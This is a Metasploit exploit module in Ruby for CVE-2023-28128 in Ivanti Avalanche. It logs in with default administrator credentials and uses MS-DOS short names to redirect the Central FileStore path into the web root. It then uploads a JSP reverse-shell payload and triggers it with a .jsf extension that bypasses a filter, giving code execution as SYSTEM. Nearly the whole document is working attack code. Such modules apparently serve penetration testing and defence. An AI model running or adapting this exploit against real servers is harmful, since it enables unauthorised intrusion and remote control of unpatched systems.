Ivanti Avalanche FileStoreConfig Shell Upload

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::FileDropper  
prepend Msf::Exploit::Remote::AutoCheck  
include Msf::Exploit::Remote::HttpClient  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'Ivanti Avalanche FileStoreConfig File Upload',  
'Description' => %q{  
Ivanti Avalanche prior to v6.4.0.186 permits MS-DOS style short  
names in the configuration path for the Central FileStore. Because of  
this, an administrator can change the default path to the web root  
of the applications, upload a JSP file, and achieve RCE as NT AUTHORITY\SYSTEM.  
},  
'License' => MSF_LICENSE,  
'Author' => [  
'Piotr Bazydlo', # @chudypb - Vulnerability Discovery  
'Shelby Pace' # Metasploit module  
],  
'References' => [  
['URL', 'https://www.zerodayinitiative.com/advisories/ZDI-23-456/'],  
['URL', 'https://forums.ivanti.com/s/article/ZDI-CAN-17812-Ivanti-Avalanche-FileStoreConfig-Arbitrary-File-Upload-Remote-Code-Execution-Vulnerability?language=en_US'],  
['URL', 'https://attackerkb.com/topics/jcdcN9SN9V/cve-2023-28128'],  
['CVE', '2023-28128']  
],  
'Platform' => ['win', 'java'],  
'Privileged' => true,  
'Arch' => ARCH_JAVA,  
'Targets' => [  
[ 'Automatic Target', { 'DefaultOptions' => { 'Payload' => 'java/jsp_shell_reverse_tcp' } }]  
],  
'DisclosureDate' => '2023-04-24',  
'DefaultTarget' => 0,  
'Notes' => {  
'Stability' => [ CRASH_SAFE ],  
'Reliability' => [ REPEATABLE_SESSION ],  
'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK ]  
}  
)  
)  
  
register_options(  
[  
Opt::RPORT(8080),  
OptString.new('USERNAME', [ true, 'User name to log in with', 'amcadmin' ]),  
OptString.new('PASSWORD', [ true, 'Password to log in with', 'admin' ]),  
OptString.new('TARGETURI', [ true, 'The URI of the Example Application', '/AvalancheWeb' ])  
]  
)  
end  
  
def check  
# Cleanup should not be needed after doing just a check.  
@cleanup_needed = false  
  
res = send_request_cgi(  
'uri' => normalize_uri(target_uri.path, 'login.jsf'),  
'method' => 'GET'  
)  
  
return CheckCode::Unknown('Failed to receive a response from the application') unless res  
  
unless res.body.include?('Avalanche - User Login')  
return CheckCode::Safe('Application does not appear to be Ivanti Avalanche')  
end  
  
html = res.get_html_document  
elem = html.search('link')&.find { |link| link&.at('@href')&.text&.match(/\d+\.\d+\.\d+\.\d{1,4}/) }  
return CheckCode::Detected('Couldn\'t retrieve element containing Avalanche version') unless elem  
  
version = elem&.at('@href')&.value&.match(/(\d+\.\d+\.\d+\.\d{1,4})/)  
return CheckCode::Detected('Failed to retrieve software version') unless version && version.length >= 2  
  
version = version[1]  
vprint_status("Version of Ivanti Avalanche appears to be v#{version}")  
ver_no = Rex::Version.new(version)  
patched_version = Rex::Version.new('6.4.0.186')  
  
if ver_no >= patched_version  
CheckCode::Safe('Target has been patched!')  
elsif ver_no < patched_version  
CheckCode::Appears('Target appears to be running an unpatched version of Ivanti Avalanche!')  
else  
CheckCode::Unknown("This should never be hit! Some error occurred when grabbing the target version: #{ver_no}")  
end  
end  
  
def authenticate  
if datastore['USERNAME'].blank? && datastore['PASSWORD'].blank?  
fail_with(Failure::BadConfig, 'Please set the USERNAME and PASSWORD options')  
end  
  
res = send_request_cgi(  
'uri' => normalize_uri(target_uri.path, 'login.jsf'),  
'method' => 'GET',  
'keep_cookies' => true  
)  
  
fail_with(Failure::UnexpectedReply, 'Failed to access login page') unless res&.body&.include?('Avalanche - User Login')  
  
html = res.get_html_document  
view_state = get_view_state(html)  
fail_with(Failure::UnexpectedReply, 'Failed to retrieve view state after browsing to the login page.') unless view_state  
  
res = send_request_cgi(  
'uri' => normalize_uri(target_uri.path, 'login.jsf'),  
'method' => 'POST',  
'keep_cookies' => true,  
'vars_post' => {  
'loginForm' => 'loginForm',  
'j_idt8' => '',  
'loginField' => datastore['USERNAME'],  
'passwordField' => datastore['PASSWORD'],  
'TextCaptchaAnswer' => '',  
'javax.faces.ViewState' => view_state,  
'loginTableButton' => 'loginTableButton'  
}  
)  
  
unless res&.code == 302 && res&.headers&.dig('Location')&.include?('inventory.jsf')  
fail_with(Failure::UnexpectedReply, 'Login failed')  
end  
end  
  
def get_view_state(html)  
view_state = html.xpath("//input[@name='javax.faces.ViewState']")&.first&.at('@value')&.text  
  
view_state  
end  
  
def configure_filestore  
res = send_request_cgi(  
'uri' => normalize_uri(target_uri.path, 'app', 'FileStoreConfig.jsf'),  
'method' => 'GET',  
'keep_cookies' => true  
)  
  
unless res&.get_html_document&.xpath('//form[@id="form_filestore_tree"]')&.first  
fail_with(Failure::UnexpectedReply, 'Failed to access FileStore configuration')  
end  
  
html = res.get_html_document  
view_state = get_view_state(html)  
fail_with(Failure::UnexpectedReply, 'Failed to retrieve view state from FileStoreConfig page') unless view_state  
  
@original_config_path = html.xpath("//input[@id='txtUncPath']")&.first&.at('@value')&.text  
fail_with(Failure::UnexpectedReply, 'Unable to grab FileStore path') unless @original_config_path  
print_status("Original FileStore config path: '#{@original_config_path}'")  
  
# determine drive letter  
drive_letter = @original_config_path.match(/([a-zA-Z])(:|\$)/)  
fail_with(Failure::UnexpectedReply, 'Couldn\'t determine drive letter for path') unless drive_letter&.length&.>= 3  
drive_letter = drive_letter[1]  
  
new_config_path = "#{drive_letter}:\\PROGRA~1\\Wavelink\\AVALAN~1\\Web"  
print_status("Changing FileStore config path to '#{new_config_path}'")  
res = send_request_cgi(  
'uri' => normalize_uri(target_uri.path, 'app', 'FileStoreConfig.jsf'),  
'method' => 'POST',  
'keep_cookies' => true,  
'vars_post' => {  
'linkFileStoreConfigSave' => 'linkFileStoreConfigSave',  
'formFileStoreConfig' => 'formFileStoreConfig',  
'txtUncPath' => new_config_path,  
'txtVelocityFolder' => '',  
'javax.faces.ViewState' => view_state  
}  
)  
  
input_field_html = res&.get_html_document&.xpath('//input[@id="txtUncPath"]')&.first  
if input_field_html.blank?  
fail_with(Failure::UnexpectedReply, 'Did not receive a response containing the expected txtUncPath input field!')  
elsif input_field_html[:value] != new_config_path  
fail_with(Failure::UnexpectedReply, 'Failed to change FileStore config path')  
end  
end  
  
def get_directory_val(res, dir_name)  
html = res.get_html_document  
results = html.xpath('//tr[contains(@class, "DIRECTORY")]')  
fail_with(Failure::UnexpectedReply, 'Failed to find list of expected directories') unless results  
  
expand_dir = results.find { |result| result.at('td')&.text&.strip == dir_name }  
fail_with(Failure::UnexpectedReply, "Failed to find the '#{dir_name}' directory to write to") unless expand_dir  
data_rk = expand_dir.at('@data-rk')&.value  
fail_with(Failure::UnexpectedReply, "Failed to get value to expand #{dir_name} directory") unless data_rk  
  
data_rk  
end  
  
def expand_folder(data_rk, view_state)  
send_request_cgi(  
'uri' => normalize_uri(target_uri.path, 'app', 'FileStoreConfig.jsf'),  
'method' => 'POST',  
'keep_cookies' => true,  
'vars_post' => {  
'javax.faces.source' => 'fileStoreTree_dlgFileStoreTree',  
'javax.faces.partial.execute' => 'fileStoreTree_dlgFileStoreTree',  
'fileStoreTree_dlgFileStoreTree' => 'fileStoreTree_dlgFileStoreTree',  
'fileStoreTree_dlgFileStoreTree_expand' => data_rk,  
'javax.faces.ViewState' => view_state  
}  
)  
end  
  
def select_folder(data_rk, view_state)  
@cleanup_needed = true  
send_request_cgi(  
'uri' => normalize_uri(target_uri.path, 'app', 'FileStoreConfig.jsf'),  
'method' => 'POST',  
'keep_cookies' => true,  
'vars_post' =>  
{  
'javax.faces.source' => 'fileStoreTree_dlgFileStoreTree',  
'javax.faces.partial.execute' => 'fileStoreTree_dlgFileStoreTree',  
'javax.faces.behavior.event' => 'select',  
'javax.faces.partial.event' => 'select',  
'fileStoreTree_dlgFileStoreTree_instantSelection' => data_rk,  
'form_filestore_tree' => 'form_filestore_tree',  
'fileStoreTree_dlgFileStoreTree_selection' => data_rk,  
'javax.faces.ViewState' => view_state  
}  
)  
end  
  
def upload_payload  
payload_name = "#{Rex::Text.rand_text_alpha(5..12)}.jsp"  
# need to 'select' webapps/AvalancheWeb to upload a file  
res = send_request_cgi(  
'uri' => normalize_uri(target_uri.path, 'app', 'FileStoreConfig.jsf'),  
'method' => 'GET',  
'keep_cookies' => true  
)  
  
fail_with(Failure::UnexpectedReply, 'Failed to access updated FileStore page') unless res&.get_html_document&.xpath('//form[@id="form_filestore_tree"]')&.first  
web_data_rk = get_directory_val(res, 'webapps')  
view_state = get_view_state(res.get_html_document)  
fail_with(Failure::UnexpectedReply, 'Failed to retrieve view state after accessing the updated FileStore page') unless view_state  
  
res = expand_folder(web_data_rk, view_state)  
fail_with(Failure::UnexpectedReply, 'Did not receive response from \'webapps\' expansion') unless res  
avalanche_data_rk = get_directory_val(res, 'AvalancheWeb')  
view_state = get_view_state(res.get_html_document)  
fail_with(Failure::UnexpectedReply, 'Failed to retrieve view state after getting the directory value for AvalancheWeb') unless view_state  
res = select_folder(avalanche_data_rk, view_state)  
fail_with(Failure::UnexpectedReply, 'Did not receive response from \'AvalancheWeb\' selection') unless res  
  
view_state = get_view_state(res.get_html_document)  
fail_with(Failure::UnexpectedReply, 'Failed to retrieve view state after selecting the AvalancheWeb folder') unless view_state  
  
boundary = "#{'-' * 4}WebKitFormBoundary#{Rex::Text.rand_text_alphanumeric(16)}"  
  
post_data = "--#{boundary}\r\n"  
post_data << "Content-Disposition: form-data; name=\"upload-form\"\r\n\r\n"  
post_data << "upload-form\r\n"  
post_data << "--#{boundary}\r\n"  
post_data << "Content-Disposition: form-data; name=\"javax.faces.ViewState\"\r\n\r\n"  
post_data << "#{view_state}\r\n"  
post_data << "--#{boundary}\r\n"  
post_data << "Content-Disposition: form-data; name=\"javax.faces.partial.ajax\r\n\r\n"  
post_data << "true\r\n"  
post_data << "--#{boundary}\r\n"  
post_data << "Content-Disposition: form-data; name=\"javax.faces.partial.execute\"\r\n\r\n"  
post_data << "importFileStoreItemPanel_dlgFileStoreTree\r\n"  
post_data << "--#{boundary}\r\n"  
post_data << "Content-Disposition: form-data; name=\"javax.faces.source\"\r\n\r\n"  
post_data << "importFileStoreItemPanel_dlgFileStoreTree\r\n"  
post_data << "--#{boundary}\r\n"  
post_data << "Content-Disposition: form-data; name=\"javax.faces.partial.render\"\r\n\r\n"  
post_data << "fileStoreTree_dlgFileStoreTree managementBtns addFolderDialog_dlgFileStoreTree renameItemDialog_dlgFileStoreTree confirmDeleteItemDialog_dlgFileStoreTree importMessages\r\n"  
post_data << "--#{boundary}\r\n"  
post_data << "Content-Disposition: form-data; name=\"importFileStoreItemPanel_dlgFileStoreTree\"; filename=\"#{payload_name}\"\r\n"  
post_data << "Content-Type: application/octet-stream\r\n\r\n"  
post_data << "#{payload.encoded}\r\n"  
post_data << "--#{boundary}--\r\n"  
  
res = send_request_cgi(  
'uri' => normalize_uri(target_uri.path, 'app', 'FileStoreConfig.jsf'),  
'method' => 'POST',  
'keep_cookies' => true,  
'data' => post_data,  
'headers' => {  
'Accept' => 'application/xml, text/xml, */*; q=0.01',  
'Faces-Request' => 'partial/ajax',  
'X-RequestedWith' => 'XMLHttpRequest',  
'Content-Type' => "multipart/form-data; boundary=#{boundary}",  
'Accept-Encoding' => 'gzip, deflate'  
}  
)  
  
fail_with(Failure::UnexpectedReply, 'Failed to upload payload') unless res&.body&.include?("Imported file #{payload_name}")  
  
print_good("Successfully uploaded '#{payload_name}'")  
payload_name  
end  
  
def cleanup  
if @cleanup_needed == false  
return  
end  
  
restore_msg = 'Please manually restore FileStore config via Tools -> Central FileStore -> Configurations.'  
print_status('Attempting to restore config path')  
res = send_request_cgi(  
'uri' => normalize_uri(target_uri.path, 'app', 'FileStoreConfig.jsf'),  
'method' => 'GET',  
'keep_cookies' => true  
)  
  
unless res  
print_error("Could not access FileStore config. #{restore_msg}")  
return  
end  
  
html = res.get_html_document  
view_state = get_view_state(html)  
unless view_state  
print_error("Failed to get view state. #{restore_msg}")  
return  
end  
  
send_request_cgi(  
'uri' => normalize_uri(target_uri.path, 'app', 'FileStoreConfig.jsf'),  
'method' => 'POST',  
'keep_cookies' => true,  
'vars_post' => {  
'linkFileStoreConfigSave' => 'linkFileStoreConfigSave',  
'formFileStoreConfig' => 'formFileStoreConfig',  
'txtUncPath' => @original_config_path,  
'txtVelocityFolder' => '',  
'javax.faces.ViewState' => view_state  
}  
)  
  
res = send_request_cgi(  
'uri' => normalize_uri(target_uri.path, 'app', 'FileStoreConfig.jsf'),  
'method' => 'GET',  
'keep_cookies' => true  
)  
  
unless res&.body&.include?(@original_config_path)  
print_warning("Failed to restore the FileStore config path to its original path. #{restore_msg}")  
return  
end  
  
print_good('Successfully restored the FileStore config path')  
end  
  
def exploit  
# Starting off we shouldn't need cleanup, however if we get to the point were we start  
# to change config settings then we will need to clean that up.  
@cleanup_needed = false  
  
authenticate  
configure_filestore  
payload_name = upload_payload  
  
register_file_for_cleanup("webapps/#{payload_name}")  
send_request_cgi(  
'uri' => normalize_uri(target_uri.path, payload_name.gsub('jsp', 'jsf')), # bypasses the app's filter, but is still resolved by java faces servlet  
'method' => 'GET',  
'keep_cookies' => true  
)  
end  
end  
`